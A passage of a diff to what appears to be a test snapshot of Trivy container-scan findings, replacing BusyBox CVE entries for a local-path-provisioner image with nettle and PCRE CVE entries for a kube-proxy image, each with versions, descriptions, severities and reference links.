"https://ubuntu.com/security/notices/USN-4906-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-20305", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2021/dsa-4933", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.31.1-r20", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-28831", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", + "fixedVersion": "3.4.1-1+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3580", + "installedVersion": "3.4.1-1", + "packageName": "libnettle6", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-28831", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28831", - "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd", - "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-28831", - "https://security.gentoo.org/glsa/202105-09", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://ubuntu.com/security/notices/USN-5179-2", - "https://www.cve.org/CVERecord?id=CVE-2021-28831", + "https://access.redhat.com/security/cve/CVE-2021-3580", + "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", + "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", + "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", + "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", + "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", + "https://errata.almalinux.org/8/ALSA-2021-4451.html", + "https://errata.rockylinux.org/RLSA-2021:4451", + "https://linux.oracle.com/cve/CVE-2021-3580.html", + "https://linux.oracle.com/errata/ELSA-2022-9221.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", + "https://security.netapp.com/advisory/ntap-20211104-0006/", + "https://ubuntu.com/security/notices/USN-4990-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3580", ], }, "category": "Vulnerability", - "description": "decompress_gunzip.c in BusyBox through 1.32.1 mishandles the error bit on the huft_build result pointer, with a resultant invalid free or segmentation fault, via malformed gzip data.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "A flaw was found in the way nettle's RSA decryption functions handled specially crafted ciphertext. An attacker could use this flaw to provide a manipulated ciphertext leading to application crash and denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: invalid free or segmentation fault via malformed gzip data", + "name": "nettle: Remote crash in RSA decryption via manipulated ciphertext", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-28831", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-28831", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28831", - }, - { - "type": "URL", - "value": "https://git.busybox.net/busybox/commit/?id=f25d254dfd4243698c31a4f3153d4ac72aa9e9bd", + "value": "https://avd.aquasec.com/nvd/cve-2021-3580", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/04/msg00001.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-3580", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3UDQGJRECXFS5EZVDH2OI45FMO436AC4/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1776250", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z7ZIFKPRR32ZYA3WAA2NXFA3QHHOU6FJ/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908110", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZASBW7QRRLY5V2R44MQ4QQM4CZIDHM2U/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1908334", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-28831", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922275", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202105-09", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1922276", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1965445", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1967983", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-28831", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20231", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42378", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42378", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42378", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42378", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42378", - ], - }, - "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_i()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42378", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20232", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42378", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3580", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://errata.almalinux.org/8/ALSA-2021-4451.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42378", + "value": "https://errata.rockylinux.org/RLSA-2021:4451", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://linux.oracle.com/cve/CVE-2021-3580.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://linux.oracle.com/errata/ELSA-2022-9221.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42378", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3580", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://security.netapp.com/advisory/ntap-20211104-0006/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://ubuntu.com/security/notices/USN-4990-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42378", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3580", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42379", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-14155", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42379", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42379", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42379", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42379", + "http://seclists.org/fulldisclosure/2020/Dec/32", + "http://seclists.org/fulldisclosure/2021/Feb/14", + "https://about.gitlab.com/releases/2020/07/01/security-release-13-1-2-release/", + "https://access.redhat.com/security/cve/CVE-2020-14155", + "https://bugs.gentoo.org/717920", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", + "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", + "https://errata.almalinux.org/8/ALSA-2021-4373.html", + "https://errata.rockylinux.org/RLSA-2021:4373", + "https://linux.oracle.com/cve/CVE-2020-14155.html", + "https://linux.oracle.com/errata/ELSA-2021-4373.html", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2020-14155", + "https://security.netapp.com/advisory/ntap-20221028-0010/", + "https://support.apple.com/kb/HT211931", + "https://support.apple.com/kb/HT212147", + "https://ubuntu.com/security/notices/USN-5425-1", + "https://www.cve.org/CVERecord?id=CVE-2020-14155", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.pcre.org/original/changelog.txt", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "libpcre in PCRE before 8.44 allows an integer overflow via a large number after a (?C substring.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the next_input_file()", + "name": "pcre: Integer overflow when parsing callout numeric arguments", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42379", + "value": "https://avd.aquasec.com/nvd/cve-2020-14155", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42379", + "value": "http://seclists.org/fulldisclosure/2020/Dec/32", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "http://seclists.org/fulldisclosure/2021/Feb/14", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42379", + "value": "https://about.gitlab.com/releases/2020/07/01/security-release-13-1-2-release/", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://access.redhat.com/security/cve/CVE-2020-14155", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://bugs.gentoo.org/717920", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848436", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42379", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1848444", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20838", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14155", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42379", + "value": "https://errata.almalinux.org/8/ALSA-2021-4373.html", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42380", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42380", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42380", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42380", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42380", - ], - }, - "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the clrvar()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42380", + "value": "https://errata.rockylinux.org/RLSA-2021:4373", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42380", + "value": "https://linux.oracle.com/cve/CVE-2020-14155.html", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "https://linux.oracle.com/errata/ELSA-2021-4373.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42380", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-14155", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "https://security.netapp.com/advisory/ntap-20221028-0010/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://support.apple.com/kb/HT211931", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42380", + "value": "https://support.apple.com/kb/HT212147", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://ubuntu.com/security/notices/USN-5425-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-14155", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42380", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.pcre.org/original/changelog.txt", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42381", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-11164", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42381", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42381", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42381", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42381", + "http://openwall.com/lists/oss-security/2017/07/11/3", + "http://www.openwall.com/lists/oss-security/2023/04/11/1", + "http://www.openwall.com/lists/oss-security/2023/04/12/1", + "http://www.securityfocus.com/bid/99575", + "https://access.redhat.com/security/cve/CVE-2017-11164", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", + "https://www.cve.org/CVERecord?id=CVE-2017-11164", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "In PCRE 8.41, the OP_KETRMAX feature in the match function in pcre_exec.c allows stack exhaustion (uncontrolled recursion) when processing a crafted regular expression.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the hash_init()", + "name": "pcre: OP_KETRMAX feature in the match function in pcre_exec.c", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42381", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42381", + "value": "https://avd.aquasec.com/nvd/cve-2017-11164", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "http://openwall.com/lists/oss-security/2017/07/11/3", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42381", + "value": "http://www.openwall.com/lists/oss-security/2023/04/11/1", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "http://www.openwall.com/lists/oss-security/2023/04/12/1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "http://www.securityfocus.com/bid/99575", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "https://access.redhat.com/security/cve/CVE-2017-11164", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42381", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11164", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-11164", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42381", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-11164", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42382", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-16231", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42382", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42382", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42382", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://ubuntu.com/security/notices/USN-5179-1", - "https://www.cve.org/CVERecord?id=CVE-2021-42382", + "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", + "http://seclists.org/fulldisclosure/2018/Dec/33", + "http://www.openwall.com/lists/oss-security/2017/11/01/11", + "http://www.openwall.com/lists/oss-security/2017/11/01/3", + "http://www.openwall.com/lists/oss-security/2017/11/01/7", + "http://www.openwall.com/lists/oss-security/2017/11/01/8", + "http://www.securityfocus.com/bid/101688", + "https://access.redhat.com/security/cve/CVE-2017-16231", + "https://bugs.exim.org/show_bug.cgi?id=2047", + "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + "https://www.cve.org/CVERecord?id=CVE-2017-16231", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "** DISPUTED ** In PCRE 8.41, after compiling, a pcretest load test PoC produces a crash overflow in the function match() in pcre_exec.c because of a self-recursive call. NOTE: third parties dispute the relevance of this report, noting that there are options that can be used to limit the amount of stack that is used.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "busybox: use-after-free in awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the getvar_s()", + "name": "pcre: self-recursive call in match() in pcre_exec.c leads to denial of service", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-42382", + "value": "https://avd.aquasec.com/nvd/cve-2017-16231", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-42382", + "value": "http://packetstormsecurity.com/files/150897/PCRE-8.41-Buffer-Overflow.html", }, { "type": "URL", - "value": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", + "value": "http://seclists.org/fulldisclosure/2018/Dec/33", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42382", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/11", }, { "type": "URL", - "value": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/3", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/7", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", + "value": "http://www.openwall.com/lists/oss-security/2017/11/01/8", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-42382", + "value": "http://www.securityfocus.com/bid/101688", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211223-0002/", + "value": "https://access.redhat.com/security/cve/CVE-2017-16231", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5179-1", + "value": "https://bugs.exim.org/show_bug.cgi?id=2047", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-42382", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2017-16231", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2017-16231", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.31.1-r21", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-42383", - "installedVersion": "1.31.1-r16", - "packageName": "ssl_client", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2017-7245", + "installedVersion": "2:8.39-12", + "packageName": "libpcre3", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-42383", - "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog", - "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-42383", - "https://security.netapp.com/advisory/ntap-20211223-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-42383", + "http://www.securityfocus.com/bid/97067", + "https://access.redhat.com/errata/RHSA-2018:2486", + "https://access.redhat.com/security/cve/CVE-2017-7245", + "https://blogs.gentoo.org/ago/2017/03/20/libpcre-two-stack-based-buffer-overflow-write-in-pcre32_copy_substring-pcre_get-c/", + "https://nvd.nist.gov/vuln/detail/CVE-2017-7245", + "https://security.gentoo.org/glsa/201710-25", + "https://www.cve.org/CVERecord?id=CVE-2017-7245", ], }, "category": "Vulnerability", - "description": "A use-after-free in Busybox's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the evaluate function", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "Stack-based buffer overflow in the pcre32_copy_substring function in pcre_get.c in libpcre1 in 